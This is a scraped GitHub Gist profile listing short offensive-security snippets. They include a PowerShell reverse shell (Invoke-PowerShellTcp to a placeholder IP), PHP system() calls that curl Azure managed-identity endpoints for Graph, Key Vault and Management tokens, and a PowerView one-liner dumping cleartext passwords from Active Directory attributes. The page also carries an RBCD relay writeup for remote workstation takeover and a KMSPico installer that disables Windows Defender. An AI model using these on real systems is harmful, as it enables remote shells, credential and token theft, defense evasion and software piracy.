Skip to content

Instantly share code, notes, and snippets.

View ps-shell.ps1
iex (New-Object
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
View ConditonalAccess-Edge-UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127
C0axx / Get-GraphToken.php
Created January 3, 2023 18:16
Request access tokens for Azure Graph services
View Get-GraphToken.php
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-VaultToken.php
Last active January 3, 2023 18:28
Request Azure Keyvault Token
View Get-VaultToken.php
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / Get-ManagementToken.php
Last active January 3, 2023 18:16
Request access tokens for Azure Management services
View Get-ManagementToken.php
system('curl "$IDENTITY_ENDPOINT?resource=" -H secret:$IDENTITY_HEADER');
C0axx / gist:334294bafa7bd83cc9625fc1cfe71a2a
Created October 29, 2022 19:36 — forked from dafthack/gist:5f8c36f7468fad991e9e1f6d81ec29d4
PowerView One-Liner to Dump Cleartext Passwords From AD User Attributes
View gist:334294bafa7bd83cc9625fc1cfe71a2a
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
C0axx /
Created September 25, 2022 00:17 — forked from mgeeky/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.


Keybase proof

I hereby claim:

  • I am c0axx on github.
  • I am c0axx ( on keybase.
  • I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao

To claim this, I am signing this object:

View sysmonconfig-export.xml
<Sysmon schemaversion="4.50">
<!-- This now also determines the file names of the files preserved (String) -->
<CheckRevocation />
<!-- Disables lookup behavior, default is True (Boolean) -->
<!-- Sets the name of the directory in the C:\ root where preserved files will be saved (String)-->
<CaptureClipboard />
<!--This enables capturing the Clipboard changes-->
View Install_kmspico.ps1
$KMSUrl = ""
$KMSDst = "C:\windows\temp\"
$KMSUnzip = "C:\windows\temp\KMSPico"
$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe"
if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2016" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2019") {
Write-Host -ForegroundColor Green "[+] Temporarily disabling Windows Defender Real time Scanning"
Set-MpPreference -ExclusionPath C:\windows\temp
set-MpPreference -DisableRealtimeMonitoring $true